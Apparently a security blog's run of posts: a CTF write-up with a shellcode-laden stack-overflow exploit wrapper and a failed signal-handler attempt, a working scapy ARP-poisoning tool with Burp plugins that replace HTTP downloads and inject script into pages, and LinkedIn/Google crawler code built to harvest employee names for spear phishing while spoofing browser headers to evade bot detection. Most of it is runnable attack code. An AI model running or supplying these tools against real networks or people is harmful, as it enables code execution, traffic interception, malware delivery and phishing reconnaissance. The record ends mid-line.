So sure enough, there is a \x30 which gets below -2000000000 (close enough to -INT_MAX). To calculate, I can just take the difference of the value printed and the value of $ebp+8 at the breakpoint. The difference is 18, so in conclusion 18 “\x30”s give us a number pretty close to -INT_MAX, which is our smallest distance back to -1 to exit the loop.
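That loop cost can be modeled with 32-bit two’s-complement arithmetic. A back-of-the-envelope model (the -2000000000 is just the conditional-breakpoint threshold from above, not the exact value the binary computes):

```python
def decs_until_minus_one(start):
    # model of: dec [ebp+var_58]; cmp [ebp+var_58], -1 -- one
    # getchar/copy happens per decrement
    v = start & 0xFFFFFFFF
    return (v - 0xFFFFFFFF) % (1 << 32)

# starting near -INT_MAX still costs about 2.3 billion iterations...
print(decs_until_minus_one(-2000000000))  # -> 2294967297
# ...while starting at -2 would cost nearly the full 4.3 billion
print(decs_until_minus_one(-2))           # -> 4294967295
```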

There is still a lot of space that needs to be writable to avoid a segfault: about 2.3GB. I needed to configure my environment to allow this, and your kernel could also have restrictions.

ulimit -s unlimited
getconf ARG_MAX 

Even setting bash to the max, 2.3GB was more than 32-bit Backtrack 5 R2 allows without a kernel recompile. I ended up migrating to 64-bit Backtrack 5 R3, which allowed a big enough stack out of the box.

So now I needed to generate a massive STDIN. This is what’s overwriting my buffer and will contain my shellcode.

#!/usr/bin/python
import struct

f = open("stdin", "w")

    #spawns /bin/dash
dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

#random stack address
#retaddr = struct.pack("<I", 0xfee498c0) 
retaddr = struct.pack("<I", 0xf7e4c881) 
f.write(retaddr * 2**16)
for i in range (0,35000):
    f.write("\x90" * 2**16 + "\xcc" + dashsc)
    f.flush()

f.close()

Here’s the final wrapper. Remember, it needs enough space on the stack to copy all this garbage. I did this by creating tons of environment variables, since something in my environment was throwing an exception when I tried to make a single environment variable much bigger.

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self, path):
    self.vulnpath = path
 
    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    #this gives us a relatively close underflow
    arg1 = (18) * "\x31"

    self.payload = arg1
    self.env = { "shell" : "/bin/dash", "format" : "%3$n" }

    #add env padding - 3500 is roughly 100 MB
    #for i in range(0,3500):
    for i in range(0,35000):
        padkey = "pad" + str(i)
        self.env[padkey] = "A" * 2**16

    print "Done padding"

    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    print "no debugging - stack needs too much room"
  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)


parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
parser.add_argument('path')

args = parser.parse_args()
m = exploit(args.path)
if args.debug:
    m.rungdb()
else:
    m.pwn()

Finally, just run this while redirecting stdin, and if the environment’s right, you should get code execution.

Stage 10

This is the only one I wasn’t able to exploit. I’m not sure this one is exploitable on my Backtrack 5 R2 distro, but I’d love any feedback. There are two exploit paths I can see, and neither one of them has panned out. I eventually gave up because this is something that easily could have been exploitable on their system but not mine, especially since this CTF is from 2004.

First, notice there’s this signal call.

.text:080484F7 push    0Ah             ; handler
.text:080484F9 push    0Ah             ; sig
.text:080484FB call    _signal

When the program is sent signal 10 (e.g. kill -10), this tells it to start executing code at address 10.

Additionally, the strcpy at 08048516 allows us to overwrite everything on the stack, including the local variables (e.g. the return value of the malloc). Because of this we have an arbitrary overwrite here:


.text:08048520 mov     edx, [ebp+var_malloced]
.text:08048523 mov     eax, edx
.text:08048525 mov     edx, [ebp+arg_4]
.text:08048528 add     edx, 8
.text:0804852B mov     ecx, [edx]
.text:0804852D mov     ebx, ecx
.text:0804852F mov     cl, [ebx]
.text:08048531 mov     [eax], cl       ; eax is var_malloced + counter, cl is also controllable
.text:08048533 inc     dword ptr [edx]
.text:08048535 inc     [ebp+var_malloced]
.text:08048538 test    cl, cl
.text:0804853A jnz     short loc_804

I’ve ignored the details for now, but it’s clear we can overwrite arbitrary memory with our controlled values. The problem is that immediately after this overwrite there is an infinite loop.

To simplify things before attempting a full exploit, I tried the following in gdb to see what was possible.

The first thing I tried was writing to address 0x0000000A. If we could put shellcode there, it would execute when we send our kill. 0x00000000 does seem to be a valid userspace address. For example, we can mmap memory there:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>

int map_null_page(void) {
	size_t length = 100;
	void* mem = mmap(NULL, length, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, 0);
	if (mem == MAP_FAILED) {
		printf("failed\n");
		fflush(0);
		perror("[-] ERROR: mmap");
		return 1;
	}
	return 0;
}

int main (void) {
	map_null_page();
	printf("made it");
	return 0;
}

int main (void) {
	map_null_page();
	printf("made it");

}

Setting a breakpoint at the end of this test program, sure enough the page at 0x00000000 was mapped. Unfortunately, to make use of this memory in the target, it has to be mapped there too. Because mmap can map it, theoretically so can malloc, but if we just try to write to 0 the program segfaults.

Program received signal SIGSEGV, Segmentation fault.
0x08048531 in ?? ()
(gdb) x/i $eip
=> 0x8048531:	mov    %cl,(%eax)
(gdb) info registers
eax            0x0	0
ecx            0xbfffd842	-1073751998
...

I played around with mallocing large sizes (~3GB). This produces out-of-memory return values (malloc returns 0 when oom), but it would still segfault when I tried to write to 0.

So stepping back, I tried to figure out how signal keeps track of the signal handler. If it's stored in writable memory, I have an arbitrary overwrite, so I could just overwrite that and win. This looked even more promising when I read the man 7 signal page:

A process can change the disposition of a signal using sigaction(2) or signal(2). (The latter is less portable when establishing a signal handler; see signal(2) for details.) Using these system calls, a process can elect one of the following behaviors to occur on delivery of the signal: perform the default action; ignore the signal; or catch the signal with a signal handler, a programmer-defined function that is automatically invoked when the signal is delivered. (By default, the signal handler is invoked on the normal process stack. It is possible to arrange that the signal handler uses an alternate stack; see sigaltstack(2) for a discussion of how to do this and when it might be useful.)

This would be great! If the signal handler is stored on the process stack, I could overwrite it and win! I compiled a test program:


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>

int main (void) {
	int a;
	signal(0xA, (void (*)(int))0x47474747);
	printf("made it");
	while(1) {
	}
}

I attached to the program and searched for 0x47474747, then replaced each occurrence with 0x48484848. The idea is that if this information really is stored on the normal stack, then we could overwrite it, and then we win. I was hoping for a segfault at 0x48484848 here (not 0x47474747).

(gdb) list main
2	#include <unistd.h>
3	#include <signal.h>
4	
5	
6	
7	int main (void) {
8		int a;
9		signal(0xA, 0x47474747);
10		printf("made it");
11		while(1) {
(gdb) break 10
Breakpoint 1 at 0x8048431: file signal.c, line 10.
(gdb) run
Starting program: /root/Desktop/defcon/10/test/signal 

Breakpoint 1, main () at signal.c:10
10		printf("made it");
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) shell ps
  PID TTY          TIME CMD
 3125 pts/0    00:00:00 bash
 3280 pts/0    00:08:01 signal
 3379 pts/0    00:00:00 gdb
 3382 pts/0    00:00:00 signal
 3387 pts/0    00:00:00 ps
(gdb) shell cat /proc/3382/maps 
...
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x47474747
0xbffff248
0xbffff380
0xbffff424
3 patterns found.
(gdb) set {int}0xbffff248=0x48484848
(gdb) set {int}0xbffff380=0x48484848
(gdb) set {int}0xbffff424=0x48484848
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x47474747
Pattern not found.
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x48484848
0xbffff248
0xbffff380
0xbffff424
3 patterns found.
(gdb) continue
Continuing.

Program received signal SIGUSR1, User defined signal 1.
main () at signal.c:12
12		}
(gdb) stepi
0x47474747 in ?? ()
(gdb) print $eip
$1 = (void (*)()) 0x47474747

Boo, so that also didn't work. I also checked with memfetch, and there were no additional copies of 0x47474747 stored in writable memory.

In summary, I've tried to write directly to address 0xA, and I've tried to overwrite the signal handler, but neither worked. So with this problem I'm stuck. I'm tempted to download a 2004-era Debian and give it another try. If I do figure it out there (or if I hear feedback from people who spot something I missed), I'll update this post with the solution.

Some Practical ARP Poisoning with Scapy, IPTables, and Burp

ARP poisoning is a very old attack that you can use to get in the middle. A traditional focus of attacks like these is to gather information (whether that information is passwords, auth cookies, CSRF tokens, whatever) and there are sometimes ways to pull this off even against SSL sites (like SSL downgrades and funny domain names). One area I don’t think gets quite as much attention is using man in the middle as an active attack against flaws in various applications. Most of the information is available online, but the examples I’ve seen tend to be piecemeal and incomplete.

Getting an HTTP proxy in the Middle

In this example I’m going to use Backtrack, scapy, and Burp. While there are a lot of cool tools that implement ARP poisoning, like Ettercap and Cain & Abel, it’s straightforward to write your own that’s more precise and easier to see what’s going on.

Here’s a quick (Linux only) script that does several things. 1) it sets up iptables to forward all traffic except destination ports 80 and 443, and it routes 80 and 443 locally 2) at a given frequency, it sends arp packets to a victim that tells the victim to treat it as the gateway IP.

The code is hopefully straightforward. Usage might be: python mitm.py --victim=192.168.1.14

from scapy.all import *
import time
import argparse
import os
import sys


def arpPoison(args):
  conf.iface= args.iface
  pkt = ARP()
  pkt.psrc = args.router
  pkt.pdst = args.victim
  try:
    while 1:
      send(pkt, verbose=args.verbose)
      time.sleep(args.freq)
  except KeyboardInterrupt:
    pass  

#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
  data = os.popen("/sbin/route -n ").readlines()
  for line in data:
    if line.startswith("0.0.0.0") and (args.iface in line):
      print "Setting route to the default: " + line.split()[1]
      args.router = line.split()[1]
      return
  print "Error: unable to find default route" 
  sys.exit(0)

#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
  data = os.popen("/sbin/ifconfig " + args.iface).readlines()
  for line in data:
    if line.strip().startswith("inet addr"):
      args.proxy = line.split(":")[1].split()[0]
      print "setting proxy to: " + args.proxy
      return
  print "Error: unable to find default IP" 
  sys.exit(0)

def fwconf(args):
  #write appropriate kernel config settings
  f = open("/proc/sys/net/ipv4/ip_forward", "w")
  f.write('1')
  f.close()
  f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w")
  f.write('0')
  f.close()

  #iptables stuff
  os.system("/sbin/iptables --flush")
  os.system("/sbin/iptables -t nat --flush")
  os.system("/sbin/iptables --zero")
  os.system("/sbin/iptables -A FORWARD --in-interface " +  args.iface + " -j ACCEPT")
  os.system("/sbin/iptables -t nat --append POSTROUTING --out-interface " + args.iface + " -j MASQUERADE")
  #forward 80,443 to our proxy
  for port in args.ports.split(","):
    os.system("/sbin/iptables -t nat -A PREROUTING -p tcp --dport " + port + " --jump DNAT --to-destination " + args.proxy)

parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help="victim IP")
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall")
parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in seconds")
parser.add_argument('--ports', default="80,443", help="comma separated list of ports to forward to proxy")
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)

args = parser.parse_args()

#set default args
if args.router == None:
  getDefRoute(args)
if args.proxy == None:
  getDefIP(args)

#do iptables rules
if args.fwconf:
  fwconf(args)

arpPoison(args)

You can see some of what’s happening by dumping the arp tables on the victim machine. In my case, 192.168.1.1 is the gateway I’m spoofing.

After the script is run against the victim, the ARP tables are changed to the attacker-controlled 'proxy' value (by default the attacker machine). In this example it's easy to see that the legitimate gateway at 00:25:9c:4d:b3:cc has been replaced with our attacker machine at 00:0c:29:8c:c1:d8.

At this point all traffic routes through us, and our iptables is configured to send ports 80 and 443 to our ‘proxy’. Your proxy should be configured to listen on all interfaces and set to “invisible” mode.

You should be able to see HTTP and HTTPS traffic from the victim routing through Burp. All other traffic (e.g. DNS) should pass through unmodified. Obviously, the ports that are forwarded and whatnot can be pretty easily configured, but this post is focusing on web attacks.

The next few sections of this post are some attacks that can be useful.

Replacing an HTTP Download

It’s very common, even for some of the best security organizations in the world, to allow downloads over HTTP (even in the somewhat rare case that the rest of their site is over HTTPS). You don’t have to look very far to find applications that are able to be downloaded without encryption, and in fact Firefox was the first place I looked. Here’s a stupid example where I use a burp plugin to detect when a user tries to download firefox, and then I replace it with chrome’s setup. I’m not trying to point out any problems with Mozilla – 99% of the internet’s executables seem to be downloaded over HTTP.

The Burp plugin uses jython-burp-api (https://github.com/mwielgoszewski/jython-burp-api), which seems pretty cool. This was my first time using it.

from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements

class ExamplePlugin(Component):

    implements(IProxyRequestHandler)

    def processRequest(self, request):
        if "Firefox%20Setup%20" in request.url.geturl() and ".exe" in request.url.geturl():
            print "Firefox download detected, redirecting"
            request.host = "131.107.39.100"
            request.raw = ("GET /downloads/Firefox%20Setup%2013.0.1.exe HTTP/1.1\r\n" +
                "HOST: 131.107.39.100\r\n\r\n")


Clientside Attacks

Clientside attacks in the middle can be super interesting, and they include a lot of scenarios that aren’t always possible otherwise. Here’s a non-comprehensive list that comes to mind:

  • XSS in any HTTP site, and sometimes interaction with HTTPS sites if cookies aren’t secure
  • Cookie forcing is possible. E.g. if a CSRF protection compares a post parameter to a cookie then you can set the cookie and perform the CSRF, even if the site is HTTPS only. We talk about this in our CCC talk.
  • Forced NTLM relaying with most domain networks.
  • If XSS is already possible, you can force a victim to make these requests without convincing them to click on a link. This could be useful in targeted internal attacks, like these, that could get shells

Using the same techniques as above, we can write dirty burp plugins that insert Javascript into HTTP responses.

    def processResponse(self, request):
        #very sloppy way to call only once, forcing exception on the first call
        try:
            self.attack += 1
        except:
            script = "<script>alert(document.domain)</script>"
            #simply inject into the first </head> we see
            if "</head>" in request.response.raw:
                print "Beginning Injection..."
                print type(request.response.raw)
                request.response.raw = request.response.raw.replace("</head>", script + "</head>", 1)
                #self.attack = 1


Conclusions

Blah. Blah. Use HTTPS and expensive switches or static ports. Blah. Does this solve the problem, really? Blah. Blah.

I do have a reason for working on this. Can you pwn the corporate network just using ARP poisoning? NTLM relay attacks are freaking deadly, and I’ll be talking about them over the next few weeks, once at work and then at Blackhat as a tool arsenal demo. Man in the middle attacks like these offer a great/nasty way to target that operations guy and get code execution. More on this later.

Linkedin Crawler

The following is also source used in the grad project. I'll post the actual paper at some point, but here is the LinkedIn crawler portion with the applicable source. By its nature, this code is breakable and may not work even at the time of posting. But it did work long enough for me to gather addresses, which was the point.

Usage is/was

LinkedinPageGatherer.py Linkedinusername Linkedinpassword

Following is an excerpt from the ‘paper’.

The HTMLParser libraries are more resilient to changes in source. Both the HTMLParser and lxml libraries have different code available to process broken HTML. The HTMLParser libraries were chosen as more appropriate for these problems [lxml][htmlparsing].

There has been an effort to put all HTML specific logic in debuggable places so if the HTML generated changes then it is easy to modify the code parsing to reflect those changes (assuming equivalent information is available). However, changes in source are frequent, and the source code has had to be modified roughly every 3 months to reflect changes in HTML layout.

Unfortunately, although the functionality is simple, this program has grown to be much more complex due to roadblocks put in place by both LinkedIn and Google.

To search LinkedIn from itself, it is necessary to have a LinkedIn account. With an account, it is possible to search with or without connections, although the searching criteria differ depending on the type of account you have. Because of this, one of the criteria for searching LinkedIn is cookie management, which has to be written to keep track of the HTTP session. In addition, LinkedIn uses a POST parameter nonce at each page that must be retrieved and POSTed for every page submission. Because of the nonce, it is also necessary to login at the login page, save the nonce and the cookie, and proceed to search through the same path an actual user would.

Once the tool is able to search for companies, there is an additional limitation. With the free account, the search is limited to displaying only 100 connections. This is inconvenient as the desired number of actual connections is often much larger. The tool I’ve written takes various criteria (such as location, title, etc) to perform multiple more specific searches of 100 results each. The extra information is harvested at each search to use for later searches. With more specific searches, the tool inserts unique items into a list of users. When the initial search initiates, LinkedIn reports the total number of results (although it only lets the account view 100 at a time) so the tool uses this total number as one possible stopping condition – when a percentage of that number has been reached or a certain number of failed searches have been tried.

This is easier to illustrate with an example. In the case of FPL, there are over 2000 results. However, it can be asserted that at least one of the results is from a certain Miami address. Using this as a search restriction the total results may be reduced to 500, the first 100 of which can be inserted. It can also be asserted that there is at least one result from the Miami address who is a project manager. Using this restriction, there are only 5 results, which have different criteria to do advanced searches on. Using this iterative approach, it is possible to gather most of the 2000. In the program I have written, this functionality is still experimental and the parameters must be adjusted.
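The stopping conditions described above can be distilled into a short sketch. This is not the crawler's actual code; the data and names are purely illustrative:

```python
def gather(batches, total_results, target_percent=0.7, max_skunk=5):
    """Insert unique results until a percentage of the reported total
    is reached, or too many searches add nothing new ('skunked')."""
    found = set()
    skunked = 0
    for batch in batches:
        if len(found) >= target_percent * total_results or skunked > max_skunk:
            break
        before = len(found)
        found.update(batch)  # only unique results actually grow the set
        if len(found) == before:
            skunked += 1
    return found

# Toy overlapping "searches" against a reported total of 10 results.
batches = [{1, 2, 3, 4}, {3, 4, 5, 6}, {5, 6}, {7, 8}]
print(len(gather(batches, total_results=10)))  # 8
```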

One additional difficulty with LinkedIn is that with these results it does not display a name, only a job title associated with the company. Obviously, this is not ideal. A name is necessary for even the most basic spear phishing attacks. An email may sound slightly awkward if addressed as “Dear Project Manager in the Cyber Security Group”. The solution I found to retrieve employee names is to use Google. Using specific Google queries based on the LinkedIn names, it is possible to retrieve the names associated with a job, company, and job title.
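For instance, a search-result entry like "Project Manager at FPL" in Miami can be turned into a site-restricted Google query (the exact quoting here is illustrative; the real query format is shown in the test harness at the bottom of GoogleQueery.py):

```python
# Build the kind of site-restricted query described above.
title, company, location = "Project Manager", "FPL", "Miami"
query = 'site:linkedin.com "%s at %s" "%s"' % (title, company, location)
print(query)  # site:linkedin.com "Project Manager at FPL" "Miami"
```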

Google has a use policy prohibiting automated crawlers. Because of this policy, it does various checks on the queries to verify that the browser is a known real browser. If it is not, Google returns a 403 status stating that the browser is not known. To circumvent this, a packet dump was performed on a valid browser. The code now has a snippet to send information exactly like an actual browser would along with randomized time delays to mimic a person. It should be impossible for Google to tell the difference over the long run – whatever checks they do can be mimicked. The code includes several configurable browsers to masquerade as. Below is the code snippet including the default spoofed browser which is Firefox running on Linux.

def getHeaders(self, browser="ubuntuFF"):
  #ubuntu firefox spoof
  if browser == "ubuntuFF":
    headers = {
      "Host": "www.google.com",
      "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
      "Accept" : "text/html,application/xhtml+xml,application xml;q=0.9,*/*;q=0.8",
      "Accept-Language" : "en-us,en;q=0.5",
      "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
      "Keep-Alive" : "300",
      "Proxy-Connection" : "keep-alive"
    }
...

Although both Google and LinkedIn make it difficult to automate information mining, their approach will fundamentally fail a motivated adversary. Because these companies want to make information available to users, this information can also be retrieved automatically. Captcha technology has been one traditional solution, though by its nature it suffers from similar flaws in design.

The LinkedIn crawler program demonstrates the possibility of an attacker targeting a company to harvest people’s names, which many times can be mapped to email addresses as demonstrated in previous sections.

GoogleQueery.py

#! /usr/bin/python

#class to make google queries
#must masquerade as a legitimate browser
#Using this violates Google ToS

import httplib
import urllib
import sys
import HTMLParser
import re

#class is basically fed a google url for linkedin for the
#sole purpose of getting a linkedin link
class GoogleQueery(HTMLParser.HTMLParser):
  def __init__(self, goog_url):
    HTMLParser.HTMLParser.__init__(self)
    self.linkedinurl = []
    query = urllib.urlencode({"q": goog_url})
    conn = httplib.HTTPConnection("www.google.com")
    headers = self.getHeaders()
    conn.request("GET", "/search?hl=en&"+query, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    self.feed(data)
    self.get_num_results(data)
    conn.close()

  #this is necessary because google wants to be mean and 403 based on... not sure
  #but it seems  I must look like a real browser to get a 200
  def getHeaders(self, browser="chromium"):
    #if browser == "random":
      #TODO randomize choice
    #ubuntu firefox spoof
    if browser == "ubuntuFF":
      headers = {
        "Host": "www.google.com",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-us,en;q=0.5",
        "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive" : "300",
        "Proxy-Connection" : "keep-alive"
        }
    elif browser == "chromium":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Avail-Dictionary": "FcpNLYBN",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    elif browser == "ie":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    return headers

  def get_num_results(self, data):
    index = re.search("<b>1</b> - <b>[\d]+</b> of [\w]*[ ]?<b>([\d,]+)", data)
    try:
      self.numResults = int(index.group(1).replace(",", ""))
    except:
      self.numResults = 0
      if not "- did not match any documents. " in data:
        print "Warning: numresults parsing problem"
        print "setting number of results to 0"

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "a" and ((("linkedin.com/pub/" in attrs[0][1])
                    or  ("linkedin.com/in" in attrs[0][1]))
                    and ("http://" in attrs[0][1])
                    and ("search?q=cache" not in attrs[0][1])
                    and ("/dir/" not in attrs[0][1])):
        self.linkedinurl.append(attrs[0][1])
        #print self.linkedinurl
      #perhaps add a google cache option here in the future
    except IndexError:
      pass

#for testing
if __name__ == "__main__":
  #url = "site:linkedin.com "PROJECT ADMINISTRATOR at CAT INL QATAR W.L.L." "Qatar""
  m = GoogleQueery(url)

LinkedinHTMLParser.py

#! /usr/bin/python

#this should probably be put in LinkedinPageGatherer.py

import HTMLParser

from person_searchobj import person_searchobj

class LinkedinHTMLParser(HTMLParser.HTMLParser):
  """
  subclass of HTMLParser specifically for parsing Linkedin names to person_searchobjs
  requires a call to .feed(data), stored data in the personArray
  """
  def __init__(self):
    HTMLParser.HTMLParser.__init__(self)
    self.personArray = []
    self.personIndex = -1
    self.inGivenName = False
    self.inFamilyName = False
    self.inTitle = False
    self.inLocation = False

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "li" and attrs[0][0] == "class" and ("vcard" in attrs[0][1]):
        self.personIndex += 1
        self.personArray.append(person_searchobj())
      if attrs[0][1] == "given-name" and self.personIndex >=0:
        self.inGivenName = True
      elif attrs[0][1] == "family-name" and self.personIndex >= 0:
        self.inFamilyName = True
      elif tag == "dd" and attrs[0][1] == "title" and self.personIndex >= 0:
        self.inTitle = True
      elif tag == "span" and attrs[0][1] == "location" and self.personIndex >= 0:
        self.inLocation = True
    except IndexError:
      pass

  def handle_endtag(self, tag):
    if tag == "span":
      self.inGivenName = False
      self.inFamilyName = False
      self.inLocation = False
    elif tag == "dd":
      self.inTitle = False

  def handle_data(self, data):
    if self.inGivenName:
      self.personArray[self.personIndex].givenName = data.strip()
    elif self.inFamilyName:
      self.personArray[self.personIndex].familyName = data.strip()
    elif self.inTitle:
      self.personArray[self.personIndex].title = data.strip()
    elif self.inLocation:
      self.personArray[self.personIndex].location = data.strip()

#for testing - use a file since this is just a parser
if __name__ == "__main__":
  import sys
  file = open ("test.htm")
  df = file.read()
  parser = LinkedinHTMLParser()
  parser.feed(df)
  print "================"
  for person in parser.personArray:
    print person.goog_printstring()
  file.close()

LinkedinPageGatherer.py – this is what should be called directly.

#!/usr/bin/python

import urllib
import urllib2
import sys
import time
import copy
import pickle
import math

from person_searchobj import person_searchobj
from LinkedinHTMLParser import LinkedinHTMLParser
from GoogleQueery import GoogleQueery

#TODO add a test function that tests the website format for easy diagnostics when HTML changes
#TODO use HTMLParser like a sane person
class LinkedinPageGatherer:
  """
  class that generates the initial LinkedIn queries using the company name
  as a search parameter. These search strings will be searched using Google
  to obtain additional information (these limited initial search strings
  usually lack vital info like names)
  """
  def __init__(self, companyName, login, password, maxsearch=100,
               totalresultpercent=.7, maxskunk=100):
    """
    login and password are params for a valid LinkedIn account
    maxsearch is the number of results - LinkedIn limits unpaid accounts to 100
    totalresultpercent is the fraction of the total results this script will try to find
    maxskunk is the number of failed searches this class will attempt before giving up
    """
    #list of person_searchobj
    self.people_searchobj = []
    self.companyName = companyName
    self.login = login
    self.password = password
    self.fullurl = ("http://www.linkedin.com/search?search=&company="+companyName+
                    "&currentCompany=currentCompany", "&page_num=", "0")
    self.opener = self.linkedin_login()
    #for the smart_people_adder
    self.searchSpecific = []
    #can only look at 100 people at a time. Parameters used to narrow down queries
    self.total_results = self.get_num_results()
    self.maxsearch = maxsearch
    self.totalresultpercent = totalresultpercent
    #self.extraparameters = {"locationinfo" : [], "titleinfo" : [], "locationtitle" : [] }
    #extraparameters is a simple stack that adds keywords to restrict the search
    self.extraparameters = []
    #TODO can only look at 100 people at a time - like to narrow down queries
    #and auto grab more
    currrespercent = 0.0
    skunked = 0
    currurl = self.fullurl[0] + self.fullurl[1]
    extraparamindex = 0

    while currrespercent < self.totalresultpercent and skunked <= maxskunk:
      numresults = self.get_num_results(currurl)
      save_num = len(self.people_searchobj)

      print "-------"
      print "currurl", currurl
      print "percentage", currrespercent
      print "skunked", skunked
      print "numresults", numresults
      print "save_num", save_num

      for i in range (0, int(min(math.ceil(self.maxsearch/10), math.ceil(numresults/10)))):
        #function adds to self.people_searchobj
        print "currurl" + currurl + str(i)
        self.return_people_links(currurl + str(i))
      currrespercent = float(len(self.people_searchobj))/self.total_results
      if save_num == len(self.people_searchobj):
        skunked += 1
      for i in self.people_searchobj:
        pushTitles = [("title", gName) for gName in i.givenName.split()]
        #TODO this could be improved for more detailed results, etc, but keeping it simple for now
        pushKeywords = [("keywords", gName) for gName in i.givenName.split()]
        pushTotal = pushTitles[:] + pushKeywords[:]
        #append to extraparameters if unique
        self.push_search_parameters(pushTotal)
      print "parameters", self.extraparameters
      #get a new url to search for, if necessary
      #use the extra params in title, "keywords" parameters
      try:
        refineel = self.extraparameters[extraparamindex]
        extraparamindex += 1
        currurl = self.fullurl[0] + "&" + refineel[0] + "=" + refineel[1] + self.fullurl[1]
      except IndexError:
        break

  """
  #TODO: This idea is fine, but we should get names first to better distinguish people
  #also maybe should be moved
  def smart_people_adder(self):
    #we've already done a basic search, must do more
    if "basic" in self.searchSpecific:
  """
  def return_people_links(self, linkedinurl):
    req = urllib2.Request(linkedinurl)
    fd = self.opener.open(req)
    pagedata = ""
    while 1:
      data = fd.read(2056)
      pagedata = pagedata + data
      if not len(data):
        break
    #print pagedata
    self.parse_page(pagedata)

  def parse_page(self, page):
    thesePeople = LinkedinHTMLParser()
    thesePeople.feed(page)
    for newperson in thesePeople.personArray:
      unique = True
      for oldperson in self.people_searchobj:
        #if all these things match but they really are different people, they
        #will likely still be found as unique google results
        if (oldperson.givenName == newperson.givenName and
            oldperson.familyName == newperson.familyName and
            oldperson.title == newperson.title and
            oldperson.location == newperson.location):
              unique = False
              break
      if unique:
        self.people_searchobj.append(newperson)
  """
    print "======================="
    for person in self.people_searchobj:
      print person.goog_printstring()
  """

  #return the number of results, very breakable
  def get_num_results(self, url=None):
    #by default return total in company
    if url == None:
      fd = self.opener.open(self.fullurl[0] + "1")
    else:
      fd = self.opener.open(url)
    data = fd.read()
    fd.close()
    searchstr = '<p class="summary">'
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find("</strong>", sindex)
    return int(data[sindex:eindex].replace("<strong>", "").replace(",", "").strip())

  #returns an opener object that contains valid cookies
  def linkedin_login(self):
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    urllib2.install_opener(opener)
    #login page
    fd = opener.open("https://www.linkedin.com/secure/login?trk=hb_signin")
    data = fd.read()
    fd.close()
    #csrf 'prevention' login value
    searchstr = """<input type="hidden" name="csrfToken" value="ajax:"""
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find('"', sindex)
    params = urllib.urlencode(dict(csrfToken="ajax:-"+data[sindex:eindex],
